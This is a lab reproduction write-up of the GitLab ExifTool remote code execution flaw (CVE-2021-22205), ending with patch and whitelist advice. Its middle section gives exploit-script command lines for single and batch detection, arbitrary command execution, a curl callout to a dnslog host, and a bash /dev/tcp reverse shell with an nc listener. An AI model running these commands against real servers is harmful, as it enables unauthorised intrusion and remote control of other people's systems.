CVE Vulnerability Reappearance-CVE-2021-22205 GitLab Unauthorized RCE

CVE-2021-22205 GitLab unauthorized RCE

Vulnerability background and description

On April 15, 2021, GitLab officially released a security patch update to fix the GitLab command execution vulnerability (CVE-2021-22205). Because the ExifTool in GitLab does not correctly handle the extension of the incoming image file, the attacker can execute arbitrary commands on the target server by uploading a specially crafted malicious image, and it is found that the vulnerability is caused by the presence of an unauthorized endpoint in GitLab Can be exploited without authentication, both Community Edition (CE) and Enterprise Edition (EE) are affected, with a CVSS score of 9.9.

The version affected by the vulnerability

• 11.9 <= Gitlab CE/EE < 13.8.8
• 13.9 <= Gitlab CE/EE < 13.9.6
• 13.10 <= Gitlab CE/EE < 13.10.3

Vulnerability recurrence

This reproduction adopts the Vulhub shooting range environment, and a Vulhub shooting range needs to be built locally

Enter the shooting range environment and start the environment with the following command:

docker-compose up -d

Check if the environment port is open

docker-compose ps

Access the URL of the target:http://192.168.0.109:8080

Download the exploit script:https://github.com/Al1ex/CVE-2021-22205

vulnerability detection

python3 CVE-2021-22205.py -v true -t http://192.168.0.109:8080/

Batch detection

python3 CVE-2021-22205.py -s true -f target.txt

exploit

python3 CVE-2021-22205.py -a true -t http://192.168.0.109:8080/ -c command

dnslog probe

Website address:http://www.dnslog.cn/

python3 CVE-2021-22205.py -a true -t http://192.168.0.109:8080/ -c "curl p77j19.dnslog.cn"

rebound shell

If the target goes out of the network, you can try to reverse the shell

The unit starts monitoring

nc -lvp 4444

#先将反弹shell的命令写⼊tmp⽬录下的1.sh⽂件
python3 CVE-2021-22205.py -a true -t http://192.168.0.109:8080/ -c "echo 'bash -i >& /dev/tcp/192.168.0.109/4444 0>&1' > /tmp/1.sh"
#执⾏该⽂件
python3 CVE-2021-22205.py -a true -t http://192.168.0.109:8080/ -c "bash /tmp/1.sh"

This machine receives the listening session

Vulnerability Prevention and Remediation

official upgrade

Currently, a new version has been officially released to fix this vulnerability. Affected users are requested to upgrade to the latest version as soon as possible for protection. The official download link:https://about.gitlab.com/update/

Temporary protective measures

If relevant users cannot perform the upgrade operation temporarily, you can use the whitelist to restrict access to the web port.

Related:https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/